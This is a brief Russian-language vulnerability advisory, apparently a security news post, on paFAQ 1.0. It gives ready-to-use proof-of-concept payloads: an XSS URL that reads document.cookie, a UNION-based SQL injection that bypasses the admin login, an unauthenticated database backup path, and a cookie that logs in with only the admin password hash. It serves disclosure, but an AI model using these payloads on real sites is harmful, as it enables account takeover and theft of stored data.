В paFAQ 1.0 найден ряд уязвимостей.

1. CSS:

http:///pafaq/index.php?act=Question&id=1%3E%3C
script%3Ealert%28document.cookie %29%3C%2Fscript%3E

2. SQL-инъекция:

http://pafaq/admin/index.php?act=login&username=
'%20UNION%20SELECT%20id,name,'3858f622 30ac3c915f300c664312c63f',email,notify,permissions,
session%20FROM%20pafaq_admins%20WHERE %201/*&password=foobar

3. Неавторизованное слитие всей базы
данных:

http://path/to/pafaq/admin/backup.php

4. Атакующий может использовать хеш пароля
администратора для получения админских
прав, расшифровка не требуется:

Cookie: pafaq_user=USERNAMEHERE; pafaq_pass=PASSWORDHASH

 

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии